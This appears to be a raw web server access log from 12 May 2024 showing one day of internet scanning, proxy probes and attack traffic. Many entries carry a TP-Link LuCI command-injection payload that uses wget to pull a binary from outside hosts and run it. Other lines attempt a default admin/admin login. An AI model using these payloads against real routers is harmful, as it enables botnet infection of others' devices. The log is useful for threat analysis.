103.109.37.39 - - [12/May/2024:00:04:40 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 80.75.212.75 - - [12/May/2024:00:47:24 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 35.203.210.122 - - [12/May/2024:01:03:17 +0200] "-" 400 1930 35.203.210.122 - - [12/May/2024:01:03:17 +0200] "-" 400 1930 94.156.8.70 - - [12/May/2024:01:15:25 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 87.121.69.52 - - [12/May/2024:01:36:46 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 37.122.66.246 - - [12/May/2024:01:45:12 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.25 - - [12/May/2024:01:51:47 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 183.81.169.139 - - [12/May/2024:02:08:27 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sshdbot%3B+wget+http%3A%2F%2F146.196.67.240%2Fshk+-O+sshdbot%3B+chmod+777+sshdbot%3B+.%2Fsshdbot+tplink%3B+rm+-rf+sshdbot%60) HTTP/1.1" 404 756 141.98.11.15 - - [12/May/2024:02:37:43 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 91.92.245.67 - - [12/May/2024:02:58:58 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 161.35.230.3 - - [12/May/2024:03:17:26 +0200] "-" 400 1930 154.212.141.206 - - [12/May/2024:03:33:16 +0200] "GET / HTTP/1.1" 200 1895 106.240.234.154 - - [12/May/2024:03:40:21 +0200] "HEAD / HTTP/1.1" 200 - 106.240.234.154 - - [12/May/2024:03:40:21 +0200] "GET / HTTP/1.1" 200 1895 154.212.141.230 - - [12/May/2024:03:42:48 +0200] "GET / HTTP/1.1" 200 1895 154.212.141.230 - - [12/May/2024:03:42:49 +0200] "GET /favicon.ico HTTP/1.1" 404 729 159.65.92.234 - - [12/May/2024:04:10:56 +0200] "-" 400 1930 94.156.71.226 - - [12/May/2024:04:16:39 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 87.121.69.25 - - [12/May/2024:04:37:40 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 183.81.169.139 - - [12/May/2024:04:51:52 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sshdbot%3B+wget+http%3A%2F%2F146.196.67.240%2Fshk+-O+sshdbot%3B+chmod+777+sshdbot%3B+.%2Fsshdbot+tplink%3B+rm+-rf+sshdbot%60) HTTP/1.1" 404 756 195.1.144.109 - - [12/May/2024:04:53:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F146.196.67.240%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 74.82.47.34 - - [12/May/2024:05:05:00 +0200] "-" 400 1930 179.43.188.106 - - [12/May/2024:05:22:35 +0200] "GET / HTTP/1.1" 200 1895 103.154.63.55 - - [12/May/2024:05:47:01 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 87.121.69.25 - - [12/May/2024:06:23:36 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 183.81.169.139 - - [12/May/2024:06:43:59 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sshdbot%3B+wget+http%3A%2F%2F146.196.67.240%2Fshk+-O+sshdbot%3B+chmod+777+sshdbot%3B+.%2Fsshdbot+tplink%3B+rm+-rf+sshdbot%60) HTTP/1.1" 404 756 167.94.145.101 - - [12/May/2024:07:06:45 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.101 - - [12/May/2024:07:06:48 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.101 - - [12/May/2024:07:06:48 +0200] "GET /favicon.ico HTTP/1.1" 404 729 59.182.47.222 - - [12/May/2024:07:14:30 +0200] "GET / HTTP/1.1" 200 1895 59.182.47.222 - - [12/May/2024:07:14:30 +0200] "GET / HTTP/1.1" 200 1895 59.182.47.222 - - [12/May/2024:07:14:30 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [12/May/2024:07:17:32 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [12/May/2024:07:17:35 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [12/May/2024:07:17:36 +0200] "GET /favicon.ico HTTP/1.1" 404 729 179.43.188.106 - - [12/May/2024:07:23:06 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.52 - - [12/May/2024:07:25:04 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 107.170.248.15 - - [12/May/2024:08:06:42 +0200] "-" 400 1930 141.98.11.15 - - [12/May/2024:08:21:13 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 62.169.30.89 - - [12/May/2024:08:25:37 +0200] "HEAD / HTTP/1.1" 200 - 62.169.30.89 - - [12/May/2024:08:25:38 +0200] "GET / HTTP/1.1" 200 1895 74.82.47.31 - - [12/May/2024:08:26:32 +0200] "GET / HTTP/1.1" 200 1895 74.82.47.27 - - [12/May/2024:08:27:14 +0200] "GET /favicon.ico HTTP/1.1" 404 729 74.82.47.59 - - [12/May/2024:08:27:46 +0200] "GET /?format=json HTTP/1.1" 200 1895 74.82.47.19 - - [12/May/2024:08:28:11 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 80.75.212.75 - - [12/May/2024:08:57:54 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 84.54.51.13 - - [12/May/2024:09:06:31 +0200] "POST /login HTTP/1.1" 404 723 87.121.69.25 - - [12/May/2024:09:29:34 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 194.165.16.73 - - [12/May/2024:09:36:36 +0200] "-" 400 1930 45.142.182.70 - - [12/May/2024:10:18:08 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F50.3.182.152%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 183.81.169.139 - - [12/May/2024:10:36:32 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sshdbot%3B+wget+http%3A%2F%2F50.3.182.152%2Fshk+-O+sshdbot%3B+chmod+777+sshdbot%3B+.%2Fsshdbot+tplink%3B+rm+-rf+sshdbot%60) HTTP/1.1" 404 756 165.154.32.235 - - [12/May/2024:10:37:29 +0200] "-" 400 1930 165.154.32.235 - - [12/May/2024:10:37:40 +0200] "GET / HTTP/1.1" 200 1895 165.154.32.235 - - [12/May/2024:10:37:59 +0200] "GET /favicon.ico HTTP/1.1" 404 729 165.154.32.235 - - [12/May/2024:10:37:59 +0200] "GET /robots.txt HTTP/1.1" 404 728 165.154.32.235 - - [12/May/2024:10:38:00 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 195.1.144.107 - - [12/May/2024:10:39:24 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F50.3.182.152%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 178.215.236.52 - - [12/May/2024:10:50:27 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 87.121.69.25 - - [12/May/2024:11:00:47 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 35.203.211.174 - - [12/May/2024:11:22:31 +0200] "GET / HTTP/1.0" 200 1895 78.108.177.51 - - [12/May/2024:11:35:48 +0200] "GET / HTTP/1.0" 200 1895 141.98.11.15 - - [12/May/2024:12:48:59 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 183.81.169.139 - - [12/May/2024:12:59:05 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sshdbot%3B+wget+http%3A%2F%2F14.225.204.172%2Fhelp+-O+sshdbot%3B+chmod+777+sshdbot%3B+.%2Fsshdbot+tplink%3B+rm+-rf+sshdbot%60) HTTP/1.1" 404 756 94.156.71.233 - - [12/May/2024:13:03:44 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804 45.142.182.70 - - [12/May/2024:13:14:42 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sshdbot%3B+wget+http%3A%2F%2F14.225.204.172%2Fhelp+-O+sshdbot%3B+chmod+777+sshdbot%3B+.%2Fsshdbot+tplink%3B+rm+-rf+sshdbot%60) HTTP/1.1" 404 756 87.121.69.52 - - [12/May/2024:13:30:34 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.25 - - [12/May/2024:13:36:21 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 206.168.32.3 - - [12/May/2024:13:45:43 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [12/May/2024:13:45:46 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [12/May/2024:13:45:46 +0200] "GET /favicon.ico HTTP/1.1" 404 729 106.75.70.178 - - [12/May/2024:14:10:55 +0200] "GET / HTTP/1.1" 200 1895 80.75.212.75 - - [12/May/2024:14:13:22 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 113.200.137.106 - - [12/May/2024:14:36:55 +0200] "GET / HTTP/1.1" 400 771 147.182.242.122 - - [12/May/2024:14:57:03 +0200] "GET /?v=1&ip=157.90.17.105&port=8080 HTTP/1.1" 200 1895 87.121.69.25 - - [12/May/2024:15:01:00 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 172.105.77.209 - - [12/May/2024:15:36:53 +0200] "-" 400 1930 94.156.71.239 - - [12/May/2024:15:40:16 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 162.243.129.7 - - [12/May/2024:16:21:14 +0200] "GET /actuator/health HTTP/1.1" 404 737 195.1.144.109 - - [12/May/2024:16:31:42 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sshdbot%3B+wget+http%3A%2F%2F14.225.204.172%2Fhelp+-O+sshdbot%3B+chmod+777+sshdbot%3B+.%2Fsshdbot+tplink%3B+rm+-rf+sshdbot%60) HTTP/1.1" 404 756 91.92.245.67 - - [12/May/2024:16:34:55 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 18.230.203.21 - - [12/May/2024:16:57:39 +0200] "GET / HTTP/1.1" 200 1895 198.12.65.238 - - [12/May/2024:17:15:13 +0200] "GET / HTTP/1.1" 200 1895 183.81.169.139 - - [12/May/2024:17:26:16 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sshdbot%3B+wget+http%3A%2F%2F14.225.204.172%2Fhelp+-O+sshdbot%3B+chmod+777+sshdbot%3B+.%2Fsshdbot+tplink%3B+rm+-rf+sshdbot%60) HTTP/1.1" 404 756 72.167.44.205 - - [12/May/2024:18:03:36 +0200] "HEAD / HTTP/1.1" 200 - 72.167.44.205 - - [12/May/2024:18:03:37 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.25 - - [12/May/2024:18:07:29 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 87.121.69.25 - - [12/May/2024:18:33:40 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 87.121.69.52 - - [12/May/2024:19:11:49 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 64.225.102.43 - - [12/May/2024:19:45:57 +0200] "GET / HTTP/1.0" 200 1895 134.122.91.241 - - [12/May/2024:19:45:57 +0200] "-" 400 1930 80.75.212.75 - - [12/May/2024:19:46:23 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 207.154.255.12 - - [12/May/2024:19:52:12 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 723 157.230.103.69 - - [12/May/2024:19:52:43 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 743 142.93.105.179 - - [12/May/2024:20:02:05 +0200] "GET /v2/_catalog HTTP/1.1" 404 733 183.81.169.139 - - [12/May/2024:20:34:36 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193.233.203.237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.25 - - [12/May/2024:21:07:48 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 182.113.23.156 - - [12/May/2024:21:13:03 +0200] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 749 195.1.144.107 - - [12/May/2024:21:20:36 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193.233.203.237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 206.168.32.3 - - [12/May/2024:21:48:48 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [12/May/2024:21:48:51 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [12/May/2024:21:48:52 +0200] "GET /favicon.ico HTTP/1.1" 404 729 178.128.48.119 - - [12/May/2024:22:16:04 +0200] "GET / HTTP/1.1" 200 1895 178.128.48.119 - - [12/May/2024:22:16:05 +0200] "GET /favicon.ico HTTP/1.1" 404 729 141.98.11.15 - - [12/May/2024:22:31:45 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 80.75.212.75 - - [12/May/2024:22:32:21 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 179.43.188.110 - - [12/May/2024:22:37:03 +0200] "GET / HTTP/1.1" 200 1895 206.217.128.98 - - [12/May/2024:23:26:07 +0200] "GET / HTTP/1.1" 200 1895 183.81.169.139 - - [12/May/2024:23:42:58 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193.233.203.237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756